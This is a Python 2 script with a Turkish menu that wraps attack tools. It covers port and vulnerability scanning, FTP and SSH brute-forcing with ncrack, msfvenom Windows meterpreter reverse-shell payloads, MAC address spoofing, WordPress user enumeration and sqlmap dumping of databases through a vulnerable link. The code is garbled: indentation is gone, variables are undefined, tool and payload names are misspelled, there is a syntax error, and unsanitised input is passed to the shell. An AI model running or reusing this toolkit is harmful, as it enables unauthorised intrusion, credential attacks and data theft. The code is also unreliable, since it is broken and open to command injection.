#! /usr/bin/env python

import os

os.system("apt-get install figlet")

os.system("clear")

os.system("figlet PORT TARAMA")

print("""

Tarama Aracina Hos Geldiniz :)

-PORT TARAMA ARACI

1) Hizli Tarama

2) Servis ve Version Bilgisi

3) Isletim Sistemi Bilgisi

-ZAFIYET ANALIZI ARACI

4) Zafiyet Analizi

-GUVENLIK DUVARI TESPIT ARACI

5) Guvenlik Duvari Tespit

-EXPLOIT TARAMA ARACI

6)Exploit Tarama

-ROOTKIT TARAMA ARACI

7) Rootkit Tarama

-KABA KUVVET TARAMA ARACI

8) FTP

9) SSH

10) Telnet

11) HTTP

12) SMB

13) ROP

14) SIP

15) Redis

16) VNC

17) PostgreSQL

18) MySQL

-TROJEN ARACI PAYLOADLAR

19) windows/meterpreter/reverse\_tcp

20) windows/meterpreter/reverse\_http

21) windows/meterpreter/reverse\_https

-MAC DEGISTIRME

22) MAC Adresi Random Belirle

23) MAC Adresi Elle Belirle

24) MAC Adresi Orijinale Dondur

-ZAFIYET ANALIZ ARACI - 2

25) Zafiyet Analizi

-VPN KONTROL ARACI

26) VPN Kontrol

-WORDPRESS TARAMA ARACI

27) Hizli Tarama

28) Eklenti Tarama

29) Tema Tarama

30) Yonetici Kullanici Adi Tarama

-VERI TABANI TARAMA ARACI

31) Sadece Acik Linki Biliyorum.

32) Acik Linki ve Veritabani Adini Biliyorum.

33) Acik Linki, Veritabani Adini ve Tablo Adini Biliyorum.

34) Acik Linki, Veritabani Adini, Tablo Adini ve Colon Adini Biliyorum.

-WORDLIST ARACI

35) Wordlist

""")

islemno = raw\_input("Islem Numarasini Giriniz: ")

if(islemno=="1"):

hedefip = raw\_input("Hedef Ip Giriniz: ")

os.system("nmap " + hedefip)

elif(islemno=="2"):

hedefip = raw\_input("Hedef Ip Giriniz: ")

os.system("nmap -sS -sV " + hedefip)

elif(islemno=="3"):

hedefip = raw\_input("Hedef Ip Giriniz: ")

os.system("nmap -O " + hedefip)

elif(islemno=="4"):

hedefip = raw\_input("Hedef Ip Giriniz: ")

os.system("nikto -h " + hedefip)

elif(islemno=="5"):

site= raw\_input("Hedef Adres: ")

os.system("wafw00f " + site)

elif(islemno=="6"):

anahtarkelime = raw\_input("Anahtar Kelime Giriniz: ")

os.system("searchsloit " + anahtarkelime)

elif(islemno=="7"):

os.system("chkrootkit")

elif(islemno=="8"):

os.system("nrack -p 21 -u " + kullaniciadi + " -P " + sifre + " " + hedefip)

elif(islemno=="9"):

os.system("ncrack -p 22 -u " + kullaniciadi + " -P " + sifre + " " + hedefip)

elif(islemno=="19"):

os.system("msfvenom -p windows/meterpreter/reverse/tcp LHOST=" + ip + " LPORT=" + port + " -f exe -o " + kayityeri)

elif(islemno=="20"):

os.system("msfvenom -p windows/meterpreter/reverse\_http LHOST=" + ip + " LPORT=" + port + " -f exe -o " + kayityeri)

elif(islemno=="21"):

os.system("msfvenom -p windows/meterpreter/reverse\_htts LHOST=" + ip + " LPORT=" + port + " -f exe -o " + kayityeri)

if(islemno=="22"):

os.system("ifconfig eth0 down")

os.system("macchanger -r eth0")

os.system("ifconfig eth0 up")

print("\033[92mYeni MAC Adresi Elle Belirlendi.")

if(islemno=="23"):

macadres = raw\_input("Yeni MAC Adresi Giriniz: ")

os.system("ifconfig eth0 down")

os.system("macchanger --mac " + macadres + " eth0")

os.system("ifconfig eth0 up")

print("\033[92mYeni MAC Adresi Elle Belirlendi.")

if(islemno=="24"):

os.system("ifconfig eth0 down")

os.system("macchanger -p eth0")

os.system("ifconfig eth0 up")

print("\033[92mYeni MAC Orijinale Donduruldu.")

if(islemno=="25"):

os.system("lynis audit system")

if(islemno=="26"):

hedefip = raw\_input("Hedef Ip Giriniz: ")

os.system("ike-scan " + hedefip)

if(islemno=="27"):

site = raw\_input("Site Adresi Giriniz: ")

os.system("wpscan --url " + site)

if(islemno=="28"):

site = raw\_input("Site Adresi Giriniz: ")

os.system("wpscan --url " + site + " --enumerate p" )

if(islemno=="29"):

site = raw\_input("Site Adresi Giriniz: ")

os.system("wpscan --url " + site + " --enumerate t" )

if(islemno=="30"):

site = raw\_input("Site Adresi Giriniz: ")

os.system("wpscan --url " + site + " --enumerate u" )

if(islemno=="31"):

acikliLink = raw\_input("Acikli Link Giriniz: ")

os.system("sqlmap -u " + acikliLink + " --dbs --random-agent")

elif(islemno=="32"):

acikliLink = raw\_input("Acikli Link Giriniz: ")

veritabani = raw\_input("veritabani Adini Giriniz: ")

os.system("sqlmap -u " + acikliLink + " --D" + veritabani + " --tables --random-agent")

elif(islemno=="33"):

acikliLink = raw\_input("Acikli Link Giriniz: ")

veritabani = raw\_input("veritabani Adini Giriniz: ")

tablo = raw\_input("Tablo Adini Giriniz: ")

os.system("sqlmap -u " + acikliLink + " --D" + veritabani + " - " + tablo + " --columns --random-agent")

elif(islemno=="34"):

acikliLink = raw\_input("Acikli Link Giriniz: ")

veritabani = raw\_input("veritabani Adini Giriniz: ")

tablo = raw\_input("Tablo Adini Giriniz: ")

colon = raw\_input("Colon Adini Giriniz: ")

os.system("sqlmap -u " + acikliLink + " --D" + veritabani + " - " + tablo + " -C" + colon + " --dump --random-agent")

if(islemno=="35):

minimum = raw\_input("Minimum Karakter Sayisi Giriniz: ")

maximum = raw\_input("Maximum Karakter Sayisi Giriniz: ")

karekter = raw\_input("Istediginiz Karakter Sayisi: ")

os.system("crunch " + minimum + " " + maximum + " " + karekter)

print("Basari ile Tamamlandi..")

else:

print("Hatali Secim.!")

os.system("python Tarama\_Kutuphanem.py")

istek = raw\_input("Yeni Arama Yapmak Ister Misiniz ? (y/n): ")

if(istek=="y"):

os.system("python Tarama\_Kutuphanem.py ")

elif(istek=="n"):

print("Gorusuruz..")

else:

print("yes var no var ?!!")